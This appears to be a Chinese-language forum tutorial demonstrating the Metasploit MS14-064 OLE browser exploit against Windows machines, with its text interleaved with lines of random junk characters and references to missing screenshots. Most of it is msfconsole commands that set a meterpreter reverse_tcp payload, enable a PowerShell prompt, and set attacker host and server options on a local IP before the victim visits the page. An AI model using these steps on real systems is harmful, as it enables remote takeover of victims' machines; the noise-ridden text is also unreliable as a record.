; ]3 D2 @# J! O
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示3 M9 h# y% A/ y) D
8 p4 M0 s% Y D: t
$ \* k: b& f. s$ Y+ ~0 N4 X 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
6 C- N0 l6 {8 l% G7 Y
% B4 l, b( d8 j
( @3 e0 l$ b" J+ s% g5 [
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
- x$ T' @+ T# }: ]; D
3 y3 W2 `3 g2 O# Q# @. f, {
7 P, H# B8 f9 l' U8 j5 \/ ` set AllowPowershellPrompt true% ^" ?5 f. D* z \5 p+ C$ ?
; @) q7 f4 b+ R& _5 A8 r; Y$ H: }8 ^2 U( H
Set LHOST 192.168.0.109
* X, A: A7 N* ]0 l+ X
7 {+ n; x8 M& G8 C+ s& p- T% N
. o- N8 k: t3 ^# H set SRVHOST 192.168.0.109
$ q3 i) D5 ?" W$ j; d9 U4 I
4 _0 m2 E+ } s4 R0 _8 {1 F$ G9 Y5 O& @9 o; ^ ~2 b2 a3 q7 Q2 ~
Set uripath share7 @! {2 y" `. j1 O* ^- n& ~0 ]- }, A
( Z( N) }4 u; D2 g0 Q
* u% r9 ]9 R- A6 X ^& D. M Set srvport 80
+ g6 Z# A) k9 w% a0 {
) o, i) |* M4 F3 Q. O
: j, p, o1 E$ B8 [* I) A, w
% L- W x' M6 {$ V+ N
$ M0 V0 t* a3 V* S- [) c: b2 o: g# [/ M; p
# }) V u0 s2 |% Q$ N, S
3 F9 B# U2 J& W0 e& J1 x
n$ L. w' Z; w& n5 o$ H2 @# ] 3 b$ B* }2 B) ^4 G/ j/ V
2 ]3 i$ V( Y0 ?- h8 _8 F
- h9 P% q. E2 m! x1 Z& X( g
' M+ U+ r9 X% ~% H
' H. J5 \, l5 R! K( C
( t: ?4 f4 ?3 N( l \
# F* J4 b" [) W5 I
* b+ @8 A6 ^0 e! U d6 b5 D# e& C/ y4 h- h% q9 @; _
下面我们来访问本地地址如图:2 U7 c- z5 Z3 U7 ~, A* N
7 e+ G q# k9 O; [2 l, o" A/ J6 t F3 y
2 u0 a; I/ _# p7 N* d2 V& h
: P4 @4 A3 b" h$ r4 S; U+ C+ G: V2 m) Z6 s( P0 W5 U
1 y3 F! P, a0 I1 l/ Q
3 B" A* m# x6 ~% u, n3 m, l& _ C4 k
v- F% {0 `# a1 e7 T4 {$ H% C
+ k" V1 Y, M0 G3 Q L9 T0 Q